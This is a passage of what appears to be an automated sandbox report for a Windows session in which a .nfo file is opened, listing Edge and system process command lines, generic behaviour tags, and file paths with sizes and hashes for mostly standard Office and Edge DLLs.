C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffe8b923cb8,0x7ffe8b923cc8,0x7ffe8b923cd82⤵PID:4996
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:22⤵PID:2692
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:32⤵PID:3288
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:82⤵PID:2748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:12⤵PID:3568
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:4172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:12⤵PID:3736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:676
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:82⤵PID:1452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:12⤵PID:4604
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:12⤵PID:1828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3012 /prefetch:82⤵PID:1372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,2483010413923084917,1989148885512651586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:12⤵PID:1900
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1592
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4700
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
PID:3728
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵PID:1572
-
C:\Program Files (x86)\Windows Media Player\setup_wm.exe"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding2⤵PID:4000
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵PID:4584
-
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
C:\Windows\system32\msinfo32.exe"C:\Windows\system32\msinfo32.exe" "C:\Users\Admin\Desktop\DebugFind.nfo"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:3264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:996
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:4652
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1748
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1368
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2264
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize32KB
MD569e8486ac1094b9c19066f5f2d04e2fb
SHA13fe42d8c58e2d76b2f272d7d83baa084133159f5
SHA256c4b615cd5963f4df6a4d2447c3a19708d77ae54bf65d0ad7d370b8ba74c81d71
SHA512b8b457a5e5b905a9f6eeed7a1c0f77f0e3fd8119511a9c60f1af890a650e6f90630b8d17adce8157b4cdfcd53c62bcfe577fdec552bf0a7a587e2e8218f79609
-
Filesize
48B
MD5fb5392de1c41bffc48a74176c4bd14df
SHA14ca069c0d38e5ca258b2d743a95d98f60ef6964a
SHA2568966675c3250f21d86672e16c257f1b84c3895254fbbd1807352c29997dcdc1d
SHA512028d58bff3b55c7b0f3ca55e67f4fe809dc2c6a0f7d5ce1e1a8d6301ba68bd6706938c3418adb26c6e7bcff9dd72ea02fbd96795d56f5eb5c62f6dd69f0714ca
-
Filesize
832KB
MD5c1259bed6439aa6e5f630f76c82faaa3
SHA1bb001fca6d860de4800863b8b3ecda9661e27ac3
SHA2568454572e0371ce23c3f70b827a12b4d6aab591b1958117cdf0a0d8920c11941e
SHA51214ce580484bcd5bbfefa5d26f39b19f480d08890567abca2261409a39be0a99037a19d1f67e3888e70a0c6cb1f1651f679e7be9da3650d621b86fa44fbbea421
-
Filesize
972KB
MD5f84250cd82def6a8ddf2e96673b4c0d8
SHA1af06f75e48ff39f9203da6d5ee6a299bcc00c168
SHA256256d30061f267ff7240cf528f6aed0bb447f75dc5f8666a5bbb8d4320aab6f68
SHA51247e2a12f1c544a7259f157628808bac7f0cff5157f44f109d9d86ab43c2ae12618e0510057d17a648ed9bdbfd33f3100376ce9b63fdf52fdccd5f6b78214dd0f
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\Trust Protection Lists\Mu\Other
Filesize64B
MD5c30513c2d02b97cdcf3b429322048104
SHA10d0f47fb24255e5104dac2611042c967107a37fc
SHA2568ebde371a260c9955e63739daeba52f4a17b7c9cf00e6af00d35d92857e37247
SHA512e545fc28eb26a985ad69e07cee255ff50bfbae0e37fe758bfed04e353815c5dfd26e1f5d362c113d12e7ba7cf0ddf129c86efb63cd3e88217b4fa06c13986a99
-
Filesize
3.9MB
MD5fb544cf47c7e6aa7f45f90e0d911d07c
SHA1ff86dae2fa9291ece582f36b91c5ba0516b4a87c
SHA256982136034db61eb4c5cd684ef2b5271eaa5a3de02d640522d7f9e9a4f19f24a4
SHA512b7391b70776bc5e2396a80ea002006133a7cd347f123fc00614cf3b9955a6996c7a576753b4dbbed56d63094fd3f7ac0286c4bb1631ae59cb057992473171180
-
Filesize
558KB
MD53718c9de534a250c91af369b68cec585
SHA10f34b9a3b5dba1f9873c257e7ead475134ec3862
SHA256f2c5a7bf2f786729098a2c968d692dfc930b9992bb1d924c3e3e0158c66d1806
SHA512c91e42877a5793f3857a052616e424e6a705f7f388f49c189c52549b33719075c1762cbb171bc7b7634443e470428de60b349d3e66dbab104d7a47644bbd4c1b
-
Filesize
95KB
MD58b883cfb828e42d37338ecfd5be914f9
SHA1fc6a3aa4613ccba7144e4ea0bfc65d583fba0750
SHA256b7de8344794a8e56100fc90b16932fc3bbfbecfb1835bd91e550d2b80cfd710a
SHA512efbd59968258fb528ffed32d9c15cb8de4dae30ba9edb9c8fdf5ca0c57c5f23e7f51e17b2459853b1cf8b86cb61ceca2bcdc43b34942dc9221c48b494c014c95
-
Filesize
36KB
MD526ff67284dc3aad964b49b24a590760a
SHA196da840f7cd1de5a41d8a99d79fdb4e85739b2bb
SHA256b6385bc4bd4c360bcccd9ec85ca45d07f58081c9c40a7b41020f01dbb374dd37
SHA512dde58f02c3eab34c91729b2a75d8ef4be220beae0a22e3f80b8a892ec0dd6c0ef68f2a2c11afa71c59059ec04254b238f678eac06223f20c642dcbe46bc972d0
-
Filesize
160B
MD5c30c07baa17c138a13e17052d3fa7cf6
SHA147f192d626aa1af95002c8360b9747e98994a521
SHA256c96ca9888057e1db1eb54683f0edccd096423260557f74100af24477851cefc9
SHA512881c0123c794f2b6b034cb18bd69ac3c31d5947e01b680b46c0973a498d5f9b45a89acf7907fa23ca1c2691dd900931aecbe5795c187fde1f2e696166a825d90
-
Filesize
48B
MD59f6949929ca656c791ebe02c48152ccf
SHA11286460cb7df2d96c69c43d6ce21114d57116c03
SHA2565316fdaecdb6d5d12bd8d1d5b0af2441a637e3fcb4bb6dbe1ad6b98e294458d1
SHA5121bde7ede376e8d55ef2743f439796b9f16937c44c895bb31d41e35f51cf875cac1c8e1f1e4fc5df3085f8e97d1829b53b6f27a5ab25f8412022b8b936ef130e6
-
C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Localytics.dll
Filesize16B
MD504992ba54c98703d1587f7e7bd14bb6e
SHA1d45161b17f67a5cfbff199b63df862ef698f42c5
SHA256bb4a87c51ddd413ecee6a41edac55bebdbb323a7626a8b9adbd733c2b189e211
SHA5122b09199c686645d85df768bd9b5ee2c09abb6b17123a0ea1fe94a74ea28535b4091d90ed58e846aed6dccc4708fdb88e23157d12a88cff691b29d9b7f4e3b285
-
C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll
Filesize274KB
MD5c3de2e0ef2390208308d19a667511d7c
SHA1aafd4b775254040f75ca42dde63b046f8cbc303b
SHA256bf5bf44f16687a3283b454d28aa0bcd1366207b1cb8e613954be134213c1556c
SHA5120e33e40be8b9c47e0d432e3d1cd1547042d7ec7904ebff4d0806133948f0b47b0a74a75f30a46a09baeb1e6b6668030368875b3bd91d18e3ed4ff86282d4ab79
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dll
Filesize18KB
MD5339c6be0eab616094ea3396922b07939
SHA101aed2283df54a5fd3eaa3be4f2f34150b11e731
SHA2564cd00bd528f99af87460a8d49ae99d391e22b124ddd2731571f10c68cebfee8e
SHA5125740312ce9c4346196fb6fe5b25a9e5fe5910aea84e018d913ac786ffe5c2018fe6ed2fc8c7105dd8c6404378479646bae9c93a0e75edf76b687fbdc5afef43c
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dll
Filesize18KB
MD554f0489fe04448cffaf9390692c22463
SHA16ce434026a626fb5b07cb0e9b39fb4b0946ddca3
SHA2566fef35d904c82c9a5706edfd9105482cc63132651a468b6b368c25e64a7cddf4
SHA5123031b323a2ffa8423f9fe86c60003194c97bd9b1a88cab8658e9b7208af3e862a5a18ae18fdf71a6df68de4e3f1b73bf6c4301867f1339e1bbf7a14afc959d4b
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dll
Filesize20KB
MD554fc546b71b78e7beb9589b02d33e054
SHA12a97bb834646e3e3899b8f851a76ce25f99465f8
SHA256993cbad15c696310e2085080ab2cb56d0e5ace98f968077a74dd01bb93d16cc6
SHA512db3d89190db3d5f9da4e72163f5886c0dd8176857ead49305ce3e0af8655306afd29ed0fe18de426ebfc99354b247d166f78e7ec754c3efc424528d644b21da8
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dll
Filesize18KB
MD5b490d4c8ebcf01e65b2d6eb239d82420
SHA1a376aec1ae9538cf95f8b474215e2981522c1468
SHA2568bff7db2ba3c699d9db85a90905defc041cb87b72dd7cf6040576c80ec102175
SHA512179a1e5b8f2dd1a06cd5bce3a0108fa6aae03471aeb5211b3c60abdee8b056440f6ede0d7877021ead99403ec805f4c1de875cf8e21be7247c4363752711e9b3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dll
Filesize18KB
MD57910690e6c08fe8b229f795e81a9d6ba
SHA1c344232aae69dd3cea6b06e427b1cb5b4f2ff558
SHA256ab9484ff92d5586f6c76ad2f270c5afed8facc21f96a08f25126b9af23abe465
SHA512a06919224b6c1f52bda9c66386470bc775e5c4f3173b2259524781e789eb32df6bd52e74f2d5f888008b27bf364073e927a66683e42cc22f0b82a143728cede3
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-timezone-l1-1-0.dll
Filesize18KB
MD5d15dd921cbf9e0d81b94eb86b0b7101e
SHA11d94ce2f5ec4f00ed76f8643efc3917dd5d46e54
SHA25672bee22cc33d7d615a7136fdf9963333050674d0d9b54cf032f552e25fbb4b8c
SHA512da41225f9791ded813276a1934ff415ce98d84f46876c9ffa8e89e69692957677202807dac08674fb606406a3e90d5ee9a0087a96bba06994b08a9369734e31d
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-core-xstate-l2-1-0.dll
Filesize11KB
MD57b0360a1cced425944e906d15d09a90b
SHA14c323e300de86a36631f4add3afca1df1b379e6f
SHA256434a01b0b3807d7084471263f42bcc07c8e3be23abdc2585457a2840cc410c5b
SHA51230fe2b5871ebd8540c5eaa7c20f4f7ef06a6aba380e7dfd58016a4d4ba2c34d9b82371842eb20c91593aee2a23ca053739da69441f88b5673af7a11982f74150
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-conio-l1-1-0.dll
Filesize19KB
MD50bf68146c22ec9c984f0de95097c2331
SHA121c61b244d8a6c0aa037af73ec5259ea42d6bd02
SHA2564cab91bbcf997a1d76f6b7b7db543cf1d8b087d696c73c46d79286a0727b91c3
SHA512d59892ced522469855464306a4364aba9075288e37a63143a9d670e636e22fc217f80e4e621ec6592b6554643526bd23bec7ae10b7d20e27664dc3c25505aed1
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-convert-l1-1-0.dll
Filesize22KB
MD548d0edc9716f9c61bc247444abdb2121
SHA12c58d6d7fb83d343099ae6b001ccd715a543ea6b
SHA25652b13667ab66bfd3f717e17e6edb722dc42e6c655658f03a9c42d2079c62481e
SHA51209abfcfe65e5954ec61f7cd53aa690ce8cb22639019356e2362175a6ac596478fb833c023d9f72d32c9084c04107ced01ecb1a899fd4b3241f9e2520d113ff51
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-environment-l1-1-0.dll
Filesize18KB
MD5b294d35d575c1645c13f808aa45124d6
SHA1ccfa5e49dcfb040ad4576d728265c7debb87eb00
SHA256883782d4b835b2c862416bdd63fecd171f1dcebabeb181512ae6048b095fcb01
SHA51277d50b50241af441a4e7c68ff0a0cb03bfb7b40a9459977682cd2e604932ce1568902b0c195bd373b693350ef2faa1fcd156d038c8da76c1b317fcb24db2a4dd
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dll
Filesize20KB
MD5ec64027d9a14cfeb84df2b3d81431d63
SHA140bca743662d2d7298bbbe1440d65c5881854f45
SHA25677bb3f665f04654addce7de80224a2f0c609ed2417bcc53154729ff71c9759af
SHA512fe68bea1d24f02833625f999dd29829b8d8ba371e1b25cf6733b800f4d26aea59f8713c580d02e732656411934b9edd43dc2fd57ec3216579635b6a3a95d1669
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-heap-l1-1-0.dll
Filesize19KB
MD5f8a3bd5966a848bb9b45610def88facc
SHA17b2c51dc6598f993e101263d1d8dbaff01e5bc12
SHA256a6b653163c6b0a891ed66658187e4607763b344720194411a93227652a0a4034
SHA5122315dd9311cde42a1a0e6435709ffa9d2368d917cd030f45ef447a23262ca100f2182ac43b8308a747682a1f7b799fe26fe8f37fe757da3eb265adeb2092dfe2
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-locale-l1-1-0.dll
Filesize18KB
MD5cf93ae98901a9e1ff484da3ddf50de30
SHA109fa8286fa39778940a95ffd3a99432e9e436832
SHA256656f39d051e9be98742237de26a921ca488cb588c1ae2807f907c90877a8c82d
SHA512a69f6d5e96d73c0052948687e03e6630451d8c0a554fd41432d7f2ce68f5677ab63aded294c6378ac0ed7959b8540c4c8cc26606293d602ca72713c267069355
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-math-l1-1-0.dll
Filesize27KB
MD5e1c38947ee1f511d818dce91c75021b7
SHA13cc88db0d4e0cbf752f7bc559e3d710edf4bccd8
SHA256e7a0638ffc1953fd09f5e8e9a13d10617df49e176b1e1efce9ba2c0dccbbc60e
SHA512c24686fed93491afa3fafbeb57262c80149bb8beb230fbbdcb3a594e3f95dcfaf42f88a4f290cfbc74f71fc4c98152cedb174e4e75d3721f003f7c8189d67690
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-multibyte-l1-1-0.dll
Filesize26KB
MD5e35d8dc16da6a13dcede94c1ece3965f
SHA191b980d8d70dccab1382318ae2ad347f5c9104c9
SHA256f2defe88ddaf2f784bfaecf473f12502a4020dcfd12d35212d90789f489ce85b
SHA51258f3d99cfa23a35f65adab72932ad3e59923b253a1deed7db1d8f889f196d52b1461a4a6b968af27307840159dd09b34d03e4d2304d2b120474f4d90b7dd4e74
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dll
Filesize69KB
MD59b4372688253d12b26dfddf4d0f177dd
SHA141f8b6699cc20582ba11d03a7bf19213eb4dffb9
SHA256b0fdc733249a01b82ef3ae0dc5efbc21ea58c9445425047daef59294d663e248
SHA51219ad249ab54807c7f409113ffa6c7ad6cfddc989e57b76699e072c4ae8b430da33856aafbcc084de3f4cc8d7b2cd109e55fbd930418caeae80dae39057012bde
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dll
Filesize19KB
MD5caa1a1037126cfe39f529b88e7e946b1
SHA122bd24472237687c7bd645def734e95a27c23098
SHA2560d71b6088457963be4dc7811e046880bef6973ed7905055a57b02931b0051649
SHA51280871efa061a9cb1cffee94aa6c68c90bf2bc2ca4e838c29358925279ee46208b60e2ec37327bb185195f8f20ba748167ad36d73b2b57f38cebfffef689a551f
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll
Filesize22KB
MD5bcb976775c72fc4210b665ce5a24ccd4
SHA1a04a419756f5d612d7c8f4efea02b11796460611
SHA25626db9ae9ec8c5824cf52ec23ce4a19ca364e1eba7af01bbf84669bba497f3dc3
SHA512d30772629f7604efca2514311bb5d6e5e16cbf175e6c2403bc5209e6bb0db736f893331554aa7139d158550360a848fdd3b0aecd6c600f6b0647c82848f9b0de
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dll
Filesize24KB
MD5bd29e8e3f87aa3943dbfbe4434fb02f0
SHA1e37356e2dcb2ee386a78e4e2a57f44518ece4177
SHA256ef8e00bfab2a614f817f3a095ff9f6885c6627d9f8c564090c516f6dfe41fed1
SHA51200c5237c443a9cd9949eb37a02710fc875a2d707484eaceec628fefbb0afae99fe8940a436cf0cbedd7c4bbc0bea05dd4ea77242d8fb317fe223a615089a0639
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dll
Filesize24KB
MD57aaa0b61f9286f599fa89e4477617c77
SHA1a0227ff00c861153dc56f85256b933528ab41611
SHA256851b76ceea7bcc456509257b6d9418582f669482eb2bbccebbddc6eac36dcc62
SHA512bdac8e4ab872d36350e330444cd81d2d924d74b73904b677a1c418702fa822e889121ace8fae5b0832da7c19fb83efe7c291f9acaf27c5421f84455b79d5a7e6
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll
Filesize20KB
MD5ad7dd997399c01fef3512f53bfa03365
SHA1fb28aa981375a33843b949b2d35e95077be634f2
SHA256b27ace263543682a8f4cf3e197a70e9f72fe41f30ef8c2fd622268a7a2d7ed71
SHA51298cda9dffc7245495e462fb909b587e37ea776b3eddbd6cc75aa8b4395ff7f80623b66953b2ec2e36fbeb316c6afe52fddbb342908881272dbbf726ae95195b9
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dll
Filesize18KB
MD516378ce15b64cbe3b679ebe5df6fa654
SHA167ad1e257a3d5c27d2eb960638d84da613dbe1fb
SHA256b94f15fe4f5458e812fa758e141ce7289e6170e5bf4e1e61932756c668629b86
SHA51260bddd8a4f2a1bccd85ef16961e10aa7e1ca2e84ddd7b44e09d961bdb70ba1fa689dc19bec4c1ce0ef847c6c86feaa7932eb16d6a7d7465e07ca9bfca058dc5f
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\concrt140.dll
Filesize324KB
MD5c1b6d2ad5bfb8221c3923c7bae7b5589
SHA15b2810f96c363303e7b3877f4a3357f532906dda
SHA2568e8f582b9b2488b2e634a73d845de7277c222088b999ebe483c2857f0e3e75fb
SHA5127438b60821c0aa528333899bdb9c0aa500cad5c50dad15758ce01d1620a203faf8a435949208fb4ef7b3dfeb07152ee73fa66f8899037d7b15e35e4a8056b214
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\mfc140u.dll
Filesize5.6MB
MD5aede477b557ec1c0fc9f7a82a548242f
SHA119e9f21eb84f16711fcdaa893bd53e33e3c5c6ed
SHA256c146526825375b0adfe75354d18391e93e760c657ee8020c535f1d6922e4a89b
SHA512e7e54c5c19a1d6c3fa4de47a28e4455b41669cc5399d063b35af3d41d7fc5c5c6278153952b6d455be4e62d2d56cd2c323677130f3e669ed07691921e88b3afe
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp120.dll
Filesize644KB
MD5339070b0dac735546dde4f364cadced8
SHA1bcbcb401f9939f3bcb3ead22e5136e3dd621e3a6
SHA2561f17bff1d7b7a7615172db66e2fcaf85f437479a7c31e599d81fb647000c85c4
SHA512ea7db94184d313a1efcbe89f867f8002228c2b367abde6718b95ae12c138902dc8be42c1910af82a746eeaecafaeb21cd08e62fc8485f6fd9afbbfd79300ab37
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll
Filesize613KB
MD55841ff1adb3d3b5d734b994cebc888a5
SHA11f1a7f915da2e63a26ab19b427af3f5d91ce8112
SHA2566aca9012908543eb4653558887a79b095243ed5b4d94dae6eb0dbc1da1110805
SHA512eb300d5dd1e8d72a77b9eaec167ad1b35a8aaaee2194e942bd283bc4516e292f0d8e986c0759a5e41feb8591872e333b29532685cc9226400877c822479f3172
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcr120.dll
Filesize940KB
MD52ca3a080fab4bf7784c3fe7ce08da1f2
SHA18149e9b2e3680d14a25c6ee6e727e0a912372505
SHA2564eeee3e13f59013dc4a8fce6f54c8cacdffc3d347f0c998efd1db334878e8f77
SHA5127ac3f980e436e2ed69f15e9f14a4f226fce62c8c251c6ed76a0c10bfa93d9b2166a6f8dc062aa48d7d2afc1ee8173c11132e6fa8eeb37aa26b61905a7aa3b6ac
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vccorlib140.dll
Filesize358KB
MD500ddfeafa86428f64f482ee81b12b4af
SHA13474fcfbfd65488913c52912235e671b0a27bfa6
SHA256c5bf6f563fa0f108a232a1ce11c0a5bf441ca7abf14fb96185f6627babca0709
SHA51296246ac4380d5f6a5b4af61a4329211b2fbff8bcbc79bdd8912a6480806713731ba1ecd36933bf940e9a75e9e32aa8cc527f455d63051361b588905c18f59b53
-
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll
Filesize83KB
MD5fb7f6e24e5dbc7e22838136265c1a27d
SHA125f1eea2b3bd6021eb6bd60ccf9f1e554adedd9c
SHA256f18624b5eaf5294e38e43018eed61cd1cc0c2259758c86d9e0158fa1ba0eda18
